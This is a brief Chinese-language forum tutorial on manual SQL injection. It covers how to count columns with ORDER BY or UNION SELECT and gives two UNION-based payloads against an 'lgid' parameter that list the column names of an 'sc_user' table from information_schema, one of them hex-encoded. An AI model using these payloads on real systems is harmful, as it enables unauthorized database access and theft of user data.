小白:“如何判斷注入類型的方法上次也講了,我們接著講第三步驟,判斷字段數,判斷字段數有兩種方法,order by和聯(lián)合查詢,聯(lián)合查詢也可分為union select和union all select。當然啦,我這里只是講常用的兩種方法,如果有其他大牛有其他方法,那得好好討教才行。”
lgid=1 union select1,2,3,4,5,6,group_concat(distinct column_name) from information_schema.columnswhere table_schema=database() and table_name=0x73635f75736572#
(, 下載次數: 83)
上傳
點擊文件名下載附件
或者lgid=1 union select1,2,3,4,5,6,group_concat(distinct column_name) from information_schema.columnswhere table_schema=database() and table_name='sc_user'#